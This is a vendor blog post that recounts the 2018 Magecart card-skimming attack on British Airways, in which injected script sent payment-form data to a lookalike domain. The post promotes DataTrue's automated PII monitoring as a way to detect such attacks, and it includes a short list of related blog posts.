Protect your e-commerce site from Magecart Attacks: learn from the British Airways and New Egg attacks

British Airways Airplane

E-commerce sites worldwide face a growing risk from the threat group Magecart, who are perpetrating simple but sophisticated attacks on online payment forms. High profile reported victims include Ticketmaster, British Airways and New Egg, however, there are likely to be many sites compromised without their knowledge.

The British Airways’ hack was a demonstration of just how vulnerable companies, even big household names, can be with names addresses, emails, credit card information and CVV authentication numbers of up to 380,000 customers quietly siphoned off over a two week period in August 2018. While British Airways certainly takes its data privacy very seriously, this shows just how vulnerable our online properties can be without regular processes that monitor our infrastructure and report back weaknesses in our IT defences.

For anyone regularly dealing with online risk, privacy, and data protection, keeping your customer’s data safe is a top priority. With the right tools, British Airways could have recognized and stopped the hack well before it became a severe breach, something that data monitoring and validation tool DataTrue could have done through automated data assurance.

However, first – how did the hackers break past British Airways’ defences?

The data breach began on the 21st of August and was a simple heist which copied data from app and website payment pages and sent sensitive personal data to a third-party site operated by the hackers.

The British Airways attack didn’t require the perpetrators to break through the organization’s network or servers, instead, they found an unsecured part of the web page through the JavaScript libraries used by the British Airways’ website and injected a malicious piece of code into the baggage claim information page.

As a result, any time someone filled out his or her details in the baggage claim form, including names, credits card details, and CVV authentication numbers, this information was sent to the hackers’ website “baways.com” with no one the wiser for two weeks, allowing the hackers to accrue financial information on 380,000 customers. The RiskIQ team provide a more comprehensive analysis here of how the hack was perpetrated.

How DataTrue can detect Magecart attacks

DataTrue automatically tests the data your site is collecting and exposing to third party data processors. DataTrue tests can be automated to run hourly, plus before and after every code or content deployment.

DataTrue PII monitoring and detection module

In the case of British Airways, this would have meant the fictitious persona would have gone to the website, began the transaction, filled out the form and clicked submit. As this happens, the piece of malicious JavaScript would have executed, sent the information through the proxy server, to the fake “baways.com”.

At this point DataTrue would have detected the string patterns that were defined in the persona going through the proxy servers and to the hackers’ website, generating a report on what data and to which website or data processor the sensitive information was exposed to.

DataTrue would have identified the hackers’ website as a non-authorised data processor and alerted British Airways team to the hack. Contact us to find out more about how DataTrue can automatically validate and protect your data.


Related Blogs

3 Adobe Summit session post image
3 sessions we’re looking forward to at Adobe Summit 2018
As a Showcase sponsor at Adobe Summit 2018 there has been plenty to keep us busy in recent weeks preparing for the Summit. As we have now packed our bags and are...
Abobe Summit 2017 promotional tile
There’s a new Sheriff coming to the Adobe Summit 2018
DataTrue is excited to be returning for a third year to the 2018 Adobe Summit, the premier event for digital marketing and analytics professionals. DataTrue is a Showcase sponsor for...
New Feature: Email Campaign Analytics Testing
Web Analysts! Are you frustrated by seeing your company's email campaign analytics data fall into your direct traffic source. Often this is because link tagging was missing or the landing...